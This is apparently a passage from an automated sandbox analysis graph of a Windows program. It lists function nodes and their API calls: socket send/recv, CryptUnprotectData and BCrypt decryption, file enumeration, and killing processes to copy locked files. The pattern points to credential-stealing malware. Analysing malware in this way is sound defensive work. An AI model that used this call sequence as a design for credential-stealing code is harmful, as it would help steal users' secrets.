ioctlsocket 175184->175194 175185 142cea0 28 API calls 175204 140db15 _AnonymousOriginator 175185->175204 175188 14da47e CallUnexpected RaiseException 175186->175188 175187->175193 175188->175192 175197 140ca60 26 API calls 175189->175197 175191->175162 175196 140f182 175192->175196 175193->175185 175198 140f193 175194->175198 175199 140e18d 175194->175199 175195->175180 175207 14da47e CallUnexpected RaiseException 175196->175207 175203 140f11a 175197->175203 175346 140cca0 closesocket 175198->175346 175205 140e1aa __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 175199->175205 175214 140b350 2 API calls 175199->175214 175200 140db81 _AnonymousOriginator 175201 1424300 13 API calls 175200->175201 175206 140db93 175201->175206 175210 14da47e CallUnexpected RaiseException 175203->175210 175204->175125 175204->175200 175209 140e218 connect 175205->175209 175211 14d88d1 _ValidateLocalCookies 5 API calls 175206->175211 175207->175198 175208 140f19e WSAGetLastError 175213 140f1b6 175208->175213 175212 140e237 WSAGetLastError 175209->175212 175230 140e25f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 175209->175230 175210->175178 175215 140dbac 175211->175215 175216 140e2f2 175212->175216 175217 140e248 connect 175212->175217 175219 14da47e CallUnexpected RaiseException 175213->175219 175214->175205 175215->174961 175218 140e2fb WSAGetLastError 175216->175218 175216->175230 175217->175212 175217->175230 175220 140e30a 175218->175220 175221 140e35f WSAGetLastError 175218->175221 175219->175221 175222 140cb50 30 API calls 175220->175222 175233 140e354 175221->175233 175224 140cb50 30 API calls 175229 140e37d send 175224->175229 175225 140cb50 30 API calls 175231 140e51c recv 175225->175231 175227 140b350 2 API calls 175278 140e3e4 _AnonymousOriginator __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z CatchIt 175227->175278 175228 140b350 2 API calls 175228->175230 175229->175230 175232 140e394 WSAGetLastError 175229->175232 175230->175224 175230->175228 175230->175233 175237 140e48f WSAGetLastError 175230->175237 175230->175278 175231->175278 175232->175230 175234 140e3a1 send 175232->175234 175236 14da47e CallUnexpected RaiseException 175233->175236 175234->175230 175234->175232 175235 140e540 WSAGetLastError 175238 140e54d recv 175235->175238 175235->175278 175240 140f1e6 175236->175240 175237->175233 175238->175235 175238->175278 175239 142cea0 28 API calls 175239->175278 175244 14e4fe0 messages 13 API calls 175240->175244 175241 140f0f5 WSAGetLastError 175241->175233 175242 140f03b _AnonymousOriginator 175242->175240 175243 140f460 13 API calls 175242->175243 175245 140f095 closesocket 175243->175245 175260 140f1f0 _AnonymousOriginator 175244->175260 175246 140f0a7 _AnonymousOriginator 175245->175246 175246->175240 175246->175241 175247 140ef31 _AnonymousOriginator 175247->175240 175248 140f460 13 API calls 175247->175248 175249 140ef89 closesocket 175248->175249 175251 140ef9b 175249->175251 175252 140efdd freeaddrinfo 175249->175252 175251->175240 175255 140effb 175344 140ccb0 26 API calls 2 library calls 175255->175344 175261 140edf7 _AnonymousOriginator 175261->175240 175262 140f460 13 API calls 175261->175262 175265 140ee51 closesocket 175262->175265 175266 140ee63 175265->175266 175267 140eea5 freeaddrinfo 175265->175267 175266->175240 175271 140f01b 175345 140ccb0 26 API calls 2 library calls 175271->175345 175273 140eeda 175342 140f630 26 API calls 2 library calls 175273->175342 175274 140ecfb _AnonymousOriginator 175274->175240 175275 140f460 13 API calls 175274->175275 175276 140ed4d closesocket 175275->175276 175279 140eda1 freeaddrinfo 175276->175279 175280 140ed5f 175276->175280 175277 140ef11 175343 140ccb0 26 API calls 2 library calls 175277->175343 175278->175225 175278->175227 175278->175235 175278->175239 175278->175240 175278->175241 175278->175242 175278->175247 175278->175255 175278->175261 175278->175271 175278->175273 175278->175274 175278->175277 175338 1427210 28 API calls 2 library calls 175278->175338 175339 14273f0 29 API calls 4 library calls 175278->175339 175340 1424240 14 API calls 3 library calls 175278->175340 175341 1428640 28 API calls 2 library calls 175278->175341 175280->175240 175287 142cecd 175285->175287 175295 142d00a CatchIt 175285->175295 175286 142d079 175288 142d07e Concurrency::cancel_current_task 175286->175288 175287->175286 175289 142cf25 175287->175289 175290 142cf4f 175287->175290 175287->175295 175297 142cf36 CatchIt 175288->175297 175289->175288 175291 142cf30 175289->175291 175296 14d8ada collate 27 API calls 175290->175296 175290->175297 175294 14d8ada collate 27 API calls 175291->175294 175292 14e4fe0 messages 13 API calls 175293 142d088 175292->175293 175294->175297 175295->174984 175296->175297 175297->175292 175298 142cfe3 _AnonymousOriginator 175297->175298 175298->174984 175299->174905 175300->174919 175301->174944 175303 1428c0b 175302->175303 175304 1428d2e 175302->175304 175306 1428c52 175303->175306 175307 1428c7c 175303->175307 175305 1428d33 Concurrency::cancel_current_task 175304->175305 175313 1428c63 __Wcsxfrm 175305->175313 175306->175305 175309 1428c5d 175306->175309 175312 14d8ada collate 27 API calls 175307->175312 175307->175313 175308 14e4fe0 messages 13 API calls 175310 1428d3d 175308->175310 175311 14d8ada collate 27 API calls 175309->175311 175311->175313 175312->175313 175313->175308 175314 1428cec _AnonymousOriginator __Wcsxfrm 175313->175314 175314->174946 175315->174951 175316->174952 175317->174971 175318->174931 175319->174975 175320->175058 175321->175058 175322->175058 175323->175058 175324->175013 175325->175013 175326->175013 175327->175013 175328->174988 175329->175103 175330->175121 175331->175136 175332->175164 175333->175171 175334->175172 175335->175191 175336->175151 175337->175195 175338->175278 175339->175278 175340->175278 175341->175278 175342->175233 175343->175233 175344->175233 175345->175233 175346->175208 175347->175073 175348->174865 175349->174529 175350->174530 175351->174533 175353 1427df7 175352->175353 175415 142d390 175353->175415 175418 142d407 _AnonymousOriginator 175415->175418 175416 142d4ba _AnonymousOriginator 175435 14bbc80 CoInitialize 175416->175435 175417 142d59f 175419 14e4fe0 messages 13 API calls 175417->175419 175418->175416 175418->175417 175420 142d5a4 175419->175420 175423 14e4fe0 messages 13 API calls 175420->175423 175422 142d4f3 175422->175420 175424 142d524 _AnonymousOriginator 175422->175424 175425 142d5a9 175423->175425 175460 1403430 175424->175460 175427 14e4fe0 messages 13 API calls 175425->175427 175428 142d5ae 175427->175428 175436 14bbdea 175435->175436 175437 14bbcc7 CoCreateInstance 175435->175437 175443 14da47e CallUnexpected RaiseException 175436->175443 175438 14bbd2f 175437->175438 175447 14bbcf3 175437->175447 175567 14ba640 175438->175567 175443->175447 175445 14bbee7 175451 14da47e CallUnexpected RaiseException 175445->175451 175446 14bbe7f 175452 14da47e CallUnexpected RaiseException 175446->175452 175447->175446 175449 14bbd19 175447->175449 175450 14bbe49 175447->175450 175455 14da47e CallUnexpected RaiseException 175447->175455 175449->175445 175453 14da47e CallUnexpected RaiseException 175449->175453 175454 14da47e CallUnexpected RaiseException 175450->175454 175458 14bbf1d 175451->175458 175452->175449 175453->175445 175454->175446 175455->175450 175457 14d88d1 _ValidateLocalCookies 5 API calls 175458->175422 175461 140347d 175460->175461 175870 14c1960 175461->175870 175464 1404f39 175465 14e4fe0 messages 13 API calls 175464->175465 175466 140505b 175465->175466 175467 14034c3 _AnonymousOriginator 175881 14c17a0 175467->175881 175469 1403662 _AnonymousOriginator 175470 14c17a0 40 API calls 175469->175470 175471 14036d6 _AnonymousOriginator 175470->175471 175472 14c17a0 40 API calls 175471->175472 175473 14037be _AnonymousOriginator 175472->175473 175474 14c17a0 40 API calls 175473->175474 175475 1403832 _AnonymousOriginator 175474->175475 175476 14c1960 40 API calls 175475->175476 175478 14038a6 _AnonymousOriginator 175476->175478 175477 14c17a0 40 API calls 175479 140391a _AnonymousOriginator 175477->175479 175478->175477 175568 14ba67a 175567->175568 175618 14b9860 175568->175618 175570 14ba685 175571 14b9860 38 API calls 175570->175571 175572 14ba69b 175571->175572 175628 14b9960 175572->175628 175574 14ba6bc SysFreeString 175581 14ba6f1 _AnonymousOriginator 175574->175581 175576 14ba8a2 CoSetProxyBlanket 175577 14ba90a 175576->175577 175583 14ba7d6 175576->175583 175578 14d88d1 _ValidateLocalCookies 5 API calls 175577->175578 175582 14ba925 175578->175582 175579 14ba79f SysFreeString 175580 14ba7ac _AnonymousOriginator 175579->175580 175580->175576 175580->175583 175581->175579 175581->175580 175585 14ba9e0 175582->175585 175584 14da47e CallUnexpected RaiseException 175583->175584 175586 14baa13 175585->175586 175587 14b9860 38 API calls 175586->175587 175588 14baa1e 175587->175588 175589 14b9860 38 API calls 175588->175589 175590 14baa34 _AnonymousOriginator 175589->175590 175591 14babe9 175590->175591 175594 14bab11 175590->175594 175592 14d88d1 _ValidateLocalCookies 5 API calls 175591->175592 175593 14bac04 175592->175593 175597 14bac90 175593->175597 175595 14da47e CallUnexpected RaiseException 175594->175595 175596 14bac37 175595->175596 175603 14bacc8 175597->175603 175598 14bad35 175599 14d88d1 _ValidateLocalCookies 5 API calls 175598->175599 175600 14bad65 CoUninitialize 175599->175600 175600->175457 175601 14bad9d 175677 14c345f RaiseException CallUnexpected 175601->175677 175603->175598 175603->175601 175605 14bad69 175603->175605 175615 14bad75 175603->175615 175674 14c0f00 175603->175674 175604 14bae8e 175609 14da47e CallUnexpected RaiseException 175604->175609 175607 14bad70 175605->175607 175610 14da47e CallUnexpected RaiseException 175605->175610 175606 14bae5e 175611 14da47e CallUnexpected RaiseException 175606->175611 175614 14da47e CallUnexpected RaiseException 175607->175614 175608 14bae2e 175613 14da47e CallUnexpected RaiseException 175608->175613 175610->175615 175611->175604 175613->175606 175614->175608 175615->175604 175615->175606 175615->175607 175615->175608 175616 14da47e CallUnexpected RaiseException 175615->175616 175616->175607 175619 14d8ada collate 27 API calls 175618->175619 175621 14b988e 175619->175621 175620 14b98c5 175623 14b98d8 175620->175623 175624 14b98ed _com_issue_error 175620->175624 175621->175620 175646 14d9ba0 175621->175646 175623->175570 175625 14b990e 175624->175625 175626 14b992c _AnonymousOriginator 175624->175626 175625->175626 175627 14b991f SysFreeString 175625->175627 175626->175570 175627->175626 175629 14d8ada collate 27 API calls 175628->175629 175631 14b9991 175629->175631 175630 14b9a40 175634 14b9aa7 175630->175634 175635 14b9b05 _com_issue_error 175630->175635 175642 14b9a45 175630->175642 175631->175630 175632 14b99de 175631->175632 175633 14b99d6 SysStringLen 175631->175633 175636 14b99f4 SysStringLen 175632->175636 175639 14b99fb 175632->175639 175633->175632 175637 14b9abe SysFreeString 175634->175637 175638 14b9acb _AnonymousOriginator 175634->175638 175636->175639 175637->175638 175638->175574 175639->175635 175640 14b9a29 SysAllocStringByteLen 175639->175640 175640->175630 175641 14b9a4a 175640->175641 175643 14b9a6d 175641->175643 175672 14b97c0 25 API calls 4 library calls 175641->175672 175642->175635 175643->175630 175673 14b97c0 25 API calls 4 library calls 175643->175673 175647 14d9bdd 175646->175647 175648 14d9c00 175646->175648 175649 14d88d1 _ValidateLocalCookies 5 API calls 175647->175649 175650 14d9cdd _com_issue_error 175648->175650 175651 14d9c1f MultiByteToWideChar 175648->175651 175652 14d9bfa 175649->175652 175653 14d9ce7 GetLastError 175650->175653 175651->175653 175654 14d9c3c 175651->175654 175652->175620 175655 14d9cf9 _com_issue_error 175653->175655 175656 14d9cf1 175653->175656 175657 14e5124 __Wcsxfrm 13 API calls 175654->175657 175660 14d9c4e ___crtCompareStringA 175654->175660 175658 14d9cff 175655->175658 175656->175655 175657->175660 175659 14d9d10 GetLastError 175658->175659 175661 14e5109 ~collate 12 API calls 175658->175661 175662 14d9d1a 175659->175662 175663 14d9d22 _com_issue_error 175659->175663 175665 14d9c9a MultiByteToWideChar 175660->175665 175666 14d9cd3 _com_issue_error 175660->175666 175664 14d9d0d 175661->175664 175662->175663 175667 14d9d56 175663->175667 175664->175659 175665->175658 175668 14d9cae SysAllocString 175665->175668 175666->175650 175667->175620 175669 14d9cbf 175668->175669 175670 14d9cc5 175668->175670 175671 14e5109 ~collate 12 API calls 175669->175671 175670->175647 175670->175666 175671->175670 175672->175643 175673->175630 175678 14bb680 175674->175678 175679 14bb6d1 175678->175679 175871 14c17a0 40 API calls 175870->175871 175872 14c19b6 175871->175872 175873 14c19ba 175872->175873 175902 14e217e 36 API calls messages 175872->175902 175875 14c1a1c _AnonymousOriginator 175873->175875 175877 14c1a45 175873->175877 175876 14d88d1 _ValidateLocalCookies 5 API calls 175875->175876 175878 1403492 175876->175878 175879 14e4fe0 messages 13 API calls 175877->175879 175878->175464 175878->175467 175880 14c1a4a 175879->175880 175903 14c15e0 175881->175903 175883 14c180a __Getcvt 175886 1422e30 37 API calls 175883->175886 175892 14c180e _AnonymousOriginator 175883->175892 175884 14c191e _AnonymousOriginator 175885 14d88d1 _ValidateLocalCookies 5 API calls 175884->175885 175888 14c1944 175885->175888 175886->175892 175887 14c194d 175889 14e4fe0 messages 13 API calls 175887->175889 175888->175469 175890 14c1952 175889->175890 175891 14c17a0 40 API calls 175890->175891 175893 14c19b6 175891->175893 175892->175884 175892->175887 175896 14c19ba 175893->175896 175935 14e217e 36 API calls messages 175893->175935 175895 14c1a1c _AnonymousOriginator 175897 14d88d1 _ValidateLocalCookies 5 API calls 175895->175897 175896->175895 175898 14c1a45 175896->175898 175899 14c1a3f 175897->175899 175900 14e4fe0 messages 13 API calls 175898->175900 175899->175469 175901 14c1a4a 175900->175901 175902->175873 175906 14c162d 175903->175906 175910 14c1626 _AnonymousOriginator 175903->175910 175904 14d88d1 _ValidateLocalCookies 5 API calls 175905 14c1790 175904->175905 175905->175883 175908 14c1695 175906->175908 175936 1424560 13 API calls 3 library calls 175906->175936 175909 14c171d 175908->175909 175911 14247c0 13 API calls 175908->175911 175909->175910 175912 14c1796 175909->175912 175910->175904 175911->175909 175913 14e4fe0 messages 13 API calls 175912->175913 175914 14c179b 175913->175914 175915 14c15e0 40 API calls 175914->175915 175917 14c180a __Getcvt 175915->175917 175916 14c191e _AnonymousOriginator 175918 14d88d1 _ValidateLocalCookies 5 API calls 175916->175918 175919 1422e30 37 API calls 175917->175919 175925 14c180e _AnonymousOriginator 175917->175925 175921 14c1944 175918->175921 175919->175925 175920 14c194d 175922 14e4fe0 messages 13 API calls 175920->175922 175921->175883 175923 14c1952 175922->175923 175924 14c17a0 40 API calls 175923->175924 175926 14c19b6 175924->175926 175925->175916 175925->175920 175929 14c19ba 175926->175929 175937 14e217e 36 API calls messages 175926->175937 175928 14c1a1c _AnonymousOriginator 175930 14d88d1 _ValidateLocalCookies 5 API calls 175928->175930 175929->175928 175931 14c1a45 175929->175931 175932 14c1a3f 175930->175932 175933 14e4fe0 messages 13 API calls 175931->175933 175932->175883 175934 14c1a4a 175933->175934 175935->175896 175936->175906 175937->175929 176430 141eb10 176431 141fad6 176430->176431 176435 141eb79 _AnonymousOriginator 176430->176435 176432 14d88d1 _ValidateLocalCookies 5 API calls 176431->176432 176433 141faed 176432->176433 176434 14d8ada 27 API calls collate 176434->176435 176435->176431 176435->176434 176436 14101e0 14 API calls 176435->176436 176437 141faf4 176435->176437 176440 141faf9 176435->176440 176443 141fb03 176435->176443 176446 14227a0 13 API calls 176435->176446 176447 1422900 27 API calls 176435->176447 176448 141f06e GetFileAttributesA 176435->176448 176449 1410730 34 API calls 176435->176449 176450 141f169 PathFindFileNameA 176435->176450 176451 142aa30 28 API calls 176435->176451 176454 141f370 CreateFileA 176435->176454 176458 141f815 SetFileAttributesA DeleteFileA 176435->176458 176459 1410ee0 131 API calls 176435->176459 176460 1410490 176435->176460 176470 14e50f6 12 API calls __dosmaperr 176435->176470 176471 14e217e 36 API calls messages 176435->176471 176472 1424560 13 API calls 3 library calls 176435->176472 176436->176435 176438 14e4fe0 messages 13 API calls 176437->176438 176438->176440 176473 14c34bc RaiseException std::invalid_argument::invalid_argument CallUnexpected 176440->176473 176474 14c347c RaiseException std::invalid_argument::invalid_argument CallUnexpected 176443->176474 176446->176435 176447->176435 176448->176435 176449->176435 176450->176435 176451->176435 176454->176435 176455 141f3a9 GetFileSize 176454->176455 176456 14e5124 __Wcsxfrm 13 API calls 176455->176456 176457 141f3be ReadFile CloseHandle 176456->176457 176457->176435 176458->176435 176459->176435 176461 141049d __Getcvt 176460->176461 176462 14104dc RmStartSession 176461->176462 176463 14106a0 _AnonymousOriginator 176462->176463 176465 1410727 176463->176465 176468 141070a _AnonymousOriginator 176463->176468 176464 14d88d1 _ValidateLocalCookies 5 API calls 176466 1410723 176464->176466 176467 14e4fe0 messages 13 API calls 176465->176467 176466->176435 176469 141072c 176467->176469 176468->176464 176470->176435 176471->176435 176472->176435 176475 141fb10 _vcomp_fork 176476 1410810 176477 1410c2e FindNextFileW 176476->176477 176498 141081d _AnonymousOriginator 176476->176498 176477->176476 176478 1410c44 FindClose 176477->176478 176479 1410ea8 176478->176479 176484 1410c55 176478->176484 176481 14227a0 13 API calls 176479->176481 176480 14247c0 13 API calls 176480->176498 176482 1410eb0 176481->176482 176483 14d88d1 _ValidateLocalCookies 5 API calls 176482->176483 176486 1410ec7 176483->176486 176484->176484 176485 1410c7f 176484->176485 176487 1410cad FindFirstFileW 176485->176487 176490 1410ea1 FindClose 176487->176490 176491 1410ccf 176487->176491 176488 1410ed8 176489 14e4fe0 messages 13 API calls 176488->176489 176492 1410edd 176489->176492 176490->176479 176493 1410e80 FindNextFileW 176491->176493 176494 1410ced lstrcmpW 176491->176494 176493->176491 176495 1410e9b 176493->176495 176494->176493 176496 1410d03 lstrcmpW 176494->176496 176495->176490 176496->176493 176497 1410d19 176496->176497 176500 1410d4b 176497->176500 176498->176477 176498->176480 176498->176488 176501 1410ece 176498->176501 176503 14d8ada collate 27 API calls 176498->176503 176499 14247c0 13 API calls 176499->176500 176500->176499 176506 1422900 176500->176506 176518 1410730 176500->176518 176540 14c349c RaiseException std::invalid_argument::invalid_argument CallUnexpected 176501->176540 176503->176498 176509 1422968 176506->176509 176511 14229a9 176506->176511 176507 14d8ada collate 27 API calls 176515 14229c4 _AnonymousOriginator 176507->176515 176508 14d8ada collate 27 API calls 176508->176509 176509->176508 176509->176511 176510 1422a6d 176512 14d88d1 _ValidateLocalCookies 5 API calls 176510->176512 176511->176507 176513 1422a87 176512->176513 176513->176500 176514 1422a8d 176516 14e4fe0 messages 13 API calls 176514->176516 176515->176510 176515->176514 176517 1422a92 176516->176517 176517->176500 176519 14107a2 176518->176519 176520 14107e5 FindFirstFileW 176519->176520 176521 1410c44 FindClose 176520->176521 176522 1410ea8 176521->176522 176526 1410c55 176521->176526 176523 14227a0 13 API calls 176522->176523 176524 1410eb0 176523->176524 176525 14d88d1 _ValidateLocalCookies 5 API calls 176524->176525 176527 1410ec7 176525->176527 176526->176526 176528 1410c7f 176526->176528 176527->176493 176529 1410cad FindFirstFileW 176528->176529 176530 1410ea1 FindClose 176529->176530 176531 1410ccf 176529->176531 176530->176522 176532 1410e80 FindNextFileW 176531->176532 176533 1410ced lstrcmpW 176531->176533 176532->176531 176534 1410e9b 176532->176534 176533->176532 176535 1410d03 lstrcmpW 176533->176535 176534->176530 176535->176532 176537 1410d19 176535->176537 176536 14247c0 13 API calls 176536->176537 176537->176536 176538 1422900 27 API calls 176537->176538 176539 1410730 27 API calls 176537->176539 176538->176537 176539->176532 176541 14d80f9 176542 14e6123 __Toupper 28 API calls 176541->176542 176543 14d810e 176542->176543 176546 14d83ff 176543->176546 176547 14d8419 GetLocaleInfoEx 176546->176547 176548 14d8425 ___crtCompareStringW 176546->176548 176551 14d8116 176547->176551 176550 14d842a GetLocaleInfoW 176548->176550 176550->176551 176552 145e332 176553 145e339 176552->176553 176566 145dfc0 176553->176566 176557 145e34a 176558 145e49d 176557->176558 176560 145dfc0 19 API calls 176557->176560 176565 145e47b __Wcsxfrm 176557->176565 176580 145b7a0 19 API calls 176557->176580 176581 145d610 19 API calls 176557->176581 176561 145e4ab 176558->176561 176582 1458b20 13 API calls __Getcvt 176558->176582 176560->176557 176562 143b080 12 API calls 176561->176562 176563 145e4f2 176561->176563 176562->176563 176564 143b3d0 13 API calls 176563->176564 176563->176565 176564->176565 176567 145dfe4 176566->176567 176568 145dfde 176566->176568 176570 145dfef 176567->176570 176577 145e00c 176567->176577 176604 145d610 19 API calls 176568->176604 176571 14d88d1 _ValidateLocalCookies 5 API calls 176570->176571 176572 145e008 176571->176572 176572->176557 176573 145e290 176574 14d88d1 _ValidateLocalCookies 5 API calls 176573->176574 176576 145e2a4 176574->176576 176576->176557 176579 145e01c 176577->176579 176583 1460560 176577->176583 176579->176573 176605 145b6f0 13 API calls 176579->176605 176580->176557 176581->176557 176582->176561 176584 14605fd 176583->176584 176585 14662ca 176584->176585 176588 1460631 __Wcsxfrm 176584->176588 176603 1462594 176584->176603 176611 143b5f0 18 API calls 176585->176611 176589 14625b3 176588->176589 176594 1463d7b 176588->176594 176598 1458a40 19 API calls 176588->176598 176599 146628b 176588->176599 176600 1464200 176588->176600 176588->176603 176607 145b350 19 API calls __Getcvt 176589->176607 176591 14625f3 176592 1462621 176591->176592 176608 14786c0 13 API calls 176591->176608 176595 14d88d1 _ValidateLocalCookies 5 API calls 176592->176595 176594->176589 176609 143b5f0 18 API calls 176594->176609 176596 146265e 176595->176596 176596->176579 176598->176588 176610 143b5f0 18 API calls 176599->176610 176600->176579 176602 14662aa 176602->176579 176606 143b5f0 18 API calls 176603->176606 176604->176567 176605->176573 176606->176589 176607->176591 176608->176592 176609->176589 176610->176602 176611->176589 176612 14104fa RmRegisterResources 176613 1410521 RmGetList 176612->176613 176614 14106a0 _AnonymousOriginator 176612->176614 176613->176614 176615 141055b 176613->176615 176619 1410727 176614->176619 176623 141070a _AnonymousOriginator 176614->176623 176616 1410597 176615->176616 176617 141056d CopyFileA 176615->176617 176616->176614 176625 14105a1 176616->176625 176617->176614 176618 14d88d1 _ValidateLocalCookies 5 API calls 176621 1410723 176618->176621 176622 14e4fe0 messages 13 API calls 176619->176622 176620 14105b0 OpenProcess TerminateProcess 176624 14105d0 CreateFileW GetLastError SetFilePointer SetFilePointer LockFile 176620->176624 176620->176625 176628 141072c 176622->176628 176623->176618 176624->176614 176626 141062d CopyFileA UnlockFile CloseHandle 176624->176626 176625->176620 176627 1410698 176625->176627 176626->176625 176627->176614 176629 14fb7d0 176630 14fb9af 176629->176630 176631 14fb81a _vcomp_for_static_simple_init 176629->176631 176633 14d88d1 _ValidateLocalCookies 5 API calls 176630->176633 176632 14fb9aa _vcomp_for_static_end 176631->176632 176649 14fb83d _AnonymousOriginator 176631->176649 176632->176630 176634 14fb9c7 176633->176634 176636 14fb89b GetFileAttributesA 176636->176649 176638 14fb9cb 176639 14e4fe0 messages 13 API calls 176638->176639 176640 14fb9d0 176639->176640 176641 14fc8c9 176640->176641 176642 14fba43 _vcomp_for_static_simple_init 176640->176642 176643 14d88d1 _ValidateLocalCookies 5 API calls 176641->176643 176644 14fc8c4 _vcomp_for_static_end 176642->176644 176654 14fba79 _AnonymousOriginator CatchIt 176642->176654 176645 14fc8e0 176643->176645 176644->176641 176649->176632 176649->176636 176649->176638 176667 1411760 176649->176667 176709 1412d70 176649->176709 176772 1415030 176649->176772 176854 14100f0 176649->176854 176859 1410000 176649->176859 176650 14fc95e 176651 14e4fe0 messages 13 API calls 176650->176651 176652 14fc963 176651->176652 176653 1428be0 28 API calls 176653->176654 176654->176644 176654->176650 176654->176653 176655 14fbd36 GetFileAttributesA 176654->176655 176660 14fbd87 _AnonymousOriginator CatchIt 176654->176660 176655->176654 176656 14fbdb1 FindFirstFileW 176657 14fc794 FindClose 176656->176657 176656->176660 176657->176660 176658 14fc77e FindNextFileW 176658->176657 176658->176660 176659 14247c0 13 API calls 176659->176660 176660->176650 176660->176654 176660->176656 176660->176658 176660->176659 176661 1428be0 28 API calls 176660->176661 176662 14fbff5 CreateFileA 176660->176662 176666 1410ee0 131 API calls 176660->176666 176661->176660 176662->176660 176663 14fc03f GetFileSize 176662->176663 176664 14e5124 __Wcsxfrm 13 API calls 176663->176664 176665 14fc050 ReadFile CloseHandle 176664->176665 176665->176660 176666->176660 176668 141178f 176667->176668 176864 14c3258 176668->176864 176671 1402bd0 5 API calls 176672 141180b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 176671->176672 176673 1402bd0 5 API calls 176672->176673 176676 1411830 _AnonymousOriginator 176673->176676 176674 1412d39 176675 14e4fe0 messages 13 API calls 176674->176675 176677 1412d52 176675->176677 176676->176674 176678 1411b41 CopyFileA 176676->176678 176704 1411b9a _AnonymousOriginator __Wcsxfrm CatchIt 176678->176704 176679 14d88d1 _ValidateLocalCookies 5 API calls 176681 1412d32 176679->176681 176680 14126d7 _AnonymousOriginator 176680->176679 176681->176649 176682 14125ce 176683 145d550 19 API calls 176682->176683 176684 14125df 176683->176684 176867 14b62a0 176684->176867 176686 145ed10 13 API calls 176686->176704 176687 1412c14 SetFileAttributesA DeleteFileA 176687->176680 176688 14125ef 176688->176687 176689 1410330 32 API calls 176688->176689 176691 1412618 _AnonymousOriginator 176689->176691 176693 1402bd0 5 API calls 176691->176693 176692 1411e60 CryptUnprotectData 176692->176704 176702 1412751 _AnonymousOriginator 176693->176702 176695 1411cc8 BCryptOpenAlgorithmProvider 176696 1411cf0 BCryptSetProperty 176695->176696 176697 1411ce2 GetLastError 176695->176697 176698 1411d22 BCryptGenerateSymmetricKey 176696->176698 176699 1411d0e GetLastError 176696->176699 176697->176704 176700 1411d45 GetLastError 176698->176700 176698->176704 176699->176704 176700->176704 176701 1411d80 BCryptDecrypt 176701->176704 176706 1410ee0 131 API calls 176702->176706 176703 14e5124 __Wcsxfrm 13 API calls 176703->176704 176704->176674 176704->176680 176704->176682 176704->176686 176704->176692 176704->176695 176704->176698 176704->176701 176704->176703 176704->176704 176705 142aa30 28 API calls 176704->176705 176708 1428be0 28 API calls 176704->176708 176877 145e990 176704->176877 176881 14113c0 176704->176881 176705->176704 176707 1412b92 _AnonymousOriginator 176706->176707 176707->176687 176708->176704 176710 1412d9f 176709->176710 176711 14c3258 __Xtime_get_ticks 2 API calls 176710->176711 176712 1412e04 omp_get_thread_num 176711->176712 176713 1402bd0 5 API calls 176712->176713 176714 1412e1b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 176713->176714 176715 1402bd0 5 API calls 176714->176715 176720 1412e40 _AnonymousOriginator 176715->176720 176716 1415002 176717 14e4fe0 messages 13 API calls 176716->176717 176718 1415007 176717->176718 176719 14e4fe0 messages 13 API calls 176718->176719 176721 141500c 176719->176721 176720->176716 176722 1410000 13 API calls 176720->176722 176905 14c34bc RaiseException std::invalid_argument::invalid_argument CallUnexpected 176721->176905 176727 141314c 176722->176727 176724 1415016 176906 14c347c RaiseException std::invalid_argument::invalid_argument CallUnexpected 176724->176906 176726 1415020 176728 14e4fe0 messages 13 API calls 176726->176728 176734 14131e8 176727->176734 176903 1424560 13 API calls 3 library calls 176727->176903 176730 1415025 176728->176730 176731 14e4fe0 messages 13 API calls 176730->176731 176733 141502a 176731->176733 176732 1410000 13 API calls 176732->176734 176735 14e4fe0 messages 13 API calls 176733->176735 176734->176732 176736 1410490 14 API calls 176734->176736 176771 141324b _AnonymousOriginator __Wcsxfrm CatchIt 176734->176771 176737 141502f 176735->176737 176736->176734 176738 1414fda _AnonymousOriginator 176740 14d88d1 _ValidateLocalCookies 5 API calls 176738->176740 176739 1414834 _AnonymousOriginator 176739->176733 176739->176738 176741 1414ffb 176740->176741 176741->176649 176742 145d550 19 API calls 176743 1414892 176742->176743 176744 14b62a0 13 API calls 176743->176744 176746 14148a2 176744->176746 176745 1414e80 SetFileAttributesA DeleteFileA 176745->176739 176746->176745 176747 1410330 32 API calls 176746->176747 176750 14148e5 _AnonymousOriginator 176747->176750 176748 14149a2 _AnonymousOriginator 176749 1402bd0 5 API calls 176748->176749 176753 14149bd _AnonymousOriginator 176749->176753 176750->176726 176750->176748 176751 145ed10 13 API calls 176751->176771 176752 14147fb _AnonymousOriginator 176752->176733 176752->176742 176753->176730 176757 1414d61 _AnonymousOriginator 176753->176757 176754 145e990 13 API calls 176754->176771 176755 141372e CryptUnprotectData 176755->176771 176756 14113c0 19 API calls 176756->176771 176758 1410ee0 131 API calls 176757->176758 176768 1414dfe _AnonymousOriginator 176758->176768 176759 1414800 176759->176718 176759->176739 176760 14134fe BCryptOpenAlgorithmProvider 176761 1413526 BCryptSetProperty 176760->176761 176762 1413518 GetLastError 176760->176762 176763 1413544 GetLastError 176761->176763 176764 1413558 BCryptGenerateSymmetricKey 176761->176764 176762->176771 176763->176771 176765 141357b GetLastError 176764->176765 176764->176771 176765->176771 176766 14135b6 BCryptDecrypt 176766->176771 176767 14e5124 __Wcsxfrm 13 API calls 176767->176771 176768->176733 176768->176745 176770 1428be0 28 API calls 176770->176771 176771->176716 176771->176718 176771->176721 176771->176724 176771->176733 176771->176739 176771->176751 176771->176752 176771->176754 176771->176755 176771->176756 176771->176759 176771->176760 176771->176764 176771->176766 176771->176767 176771->176770 176904 14e50f6 12 API calls __dosmaperr 176771->176904 176773 141509e 176772->176773 176774 14c3258 __Xtime_get_ticks 2 API calls 176773->176774 176775 14150aa omp_get_thread_num 176774->176775 176776 1402bd0 5 API calls 176775->176776 176777 14150c1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 176776->176777 176778 1402bd0 5 API calls 176777->176778 176784 14150e6 _AnonymousOriginator 176778->176784 176779 1415ed7 176780 14e4fe0 messages 13 API calls 176779->176780 176781 1415edc 176780->176781 176782 14e4fe0 messages 13 API calls 176781->176782 176785 1415ee1 176782->176785 176783 14100f0 13 API calls 176786 14153e9 CopyFileA 176783->176786 176784->176779 176784->176783 176787 14e4fe0 messages 13 API calls 176785->176787 176818 1415427 _AnonymousOriginator CatchIt 176786->176818 176788 1415ee6 176787->176788 176789 14e4fe0 messages 13 API calls 176788->176789 176791 1415eeb 176789->176791 176790 1415eaf _AnonymousOriginator 176792 14d88d1 _ValidateLocalCookies 5 API calls 176790->176792 176795 14c3258 __Xtime_get_ticks 2 API calls 176791->176795 176794 1415ed0 